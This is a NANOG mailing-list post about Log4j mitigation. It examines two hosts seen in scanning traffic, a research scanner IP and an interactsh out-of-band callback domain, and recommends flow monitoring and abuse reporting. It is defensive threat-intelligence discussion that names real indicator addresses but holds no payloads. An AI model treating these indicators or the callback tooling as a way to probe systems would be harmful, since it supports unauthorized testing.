Log4j mitigation

Jean St-Laurent jean at ddostest.me
Mon Dec 13 13:32:11 UTC 2021 

I agree,

As an example that back what you're saying, I pasted the ip provided by Jörg in my browser.

http://45.83.64.1/

Here is the html page returned.

<html>
...
Research Scanning Project

This is a scanner of a research scanning project.

If you want to exclude your IPs from scans, please send an e-mail to exclude at alphastrike.io.

Thank you for your appreciation!
...
</html>

This ip scanner is in Germany and it looks legit, but a better investigation is recommended.

The second host provided looks more suspicious.

blah.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com resolve to
104.248.51.21 which is hosted on DigitalOcean.

Here is the html output:

<html>
...
Interactsh Server
Interactsh is an open-source solution for out-of-band data extraction. It is a tool designed to detect bugs that cause external interactions. These bugs include, Blind SQLi, Blind CMDi, SSRF, etc.

If you find communications or exchanges with the interactsh.com server in your logs, it is possible that someone has been testing your applications.

You should review the time when these interactions were initiated to identify the person responsible for this testing.

...
</html>

First, it's important to gain visibility and filter the goods from the bads.

The first ip looks legit. The second could be reported to DigitalOcean for investigation. They usually investigate very fast.

You can check for weird network flows patterns. You can also look for that suspicious html file that is crawling on http in clear text on your gears.

At ISP level, visibility is a must and patterns will clearly become easy to identify.

I agree with Karl that perfection is enemy of good.

Jean

-----Original Message-----
From: NANOG <nanog-bounces+jean=ddostest.me at nanog.org> On Behalf Of Karl Auer
Sent: December 13, 2021 7:55 AM
To: NANOG List <nanog at nanog.org>
Subject: Re: Log4j mitigation

On Mon, 2021-12-13 at 06:35 -0600, Joe Greco wrote:
> Just because there are other sources of fatalities, doesn't mean you 
> can't check for the quick obvious stuff.

Indeed.

One check, even an inadequate one, is better than no checks at all. And over time you can add more checks or improve the ones you have.

Don't let "perfect" be the enemy of "good".

Regards, K.


--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Karl Auer (kauer at biplane.com.au)
http://www.biplane.com.au/kauer

GPG fingerprint: 61A0 99A9 8823 3A75 871E 5D90 BADB B237 260C 9C58 Old fingerprint: 2561 E9EC D868 E73C 8AF1 49CF EE50 4B1D CCA1 5170

More information about the NANOG mailing list